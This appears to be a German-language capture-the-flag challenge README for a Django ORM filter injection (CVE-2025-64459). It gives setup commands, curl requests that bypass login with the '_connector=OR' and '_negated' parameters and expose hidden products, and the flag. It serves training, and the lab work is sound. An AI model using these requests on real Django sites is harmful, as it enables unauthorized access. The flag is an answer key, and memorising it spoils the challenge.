
CTF-Herausforderung, die Django-ORM-Filter-Injektion (CVE-2025-64459) mit Auth-Bypass- und Produktfilter-Bypass-Exploits demonstriert, einschließlich Bereitstellung und Flag-Abruf.
Kategorie: Web-Sicherheit
Schwierigkeit: Mittel
Schwachstelle: CVE-2025-64459 – Django ORM Filter Injection
Wir haben einen sicheren Merch-Shop mit Admin-Panel gebaut. Kannst du die Authentifizierung umgehen und die private Admin-Notiz finden
URL: http://YOUR_SERVER:6008
cd web_django_cve
docker-compose up --build -d
# Using _connector=OR
curl "http://HOST:8054/login/?username=admin&_connector=OR&is_superuser=True"
# Using _negated
curl "http://HOST:8054/login/?username=admin&_negated=True"
# Negate is_public filter
curl "http://HOST:8054/?_negated=True"
# Direct access
curl "http://HOST:8054/?is_public=False"
lol-you-here_then-you_exploited_me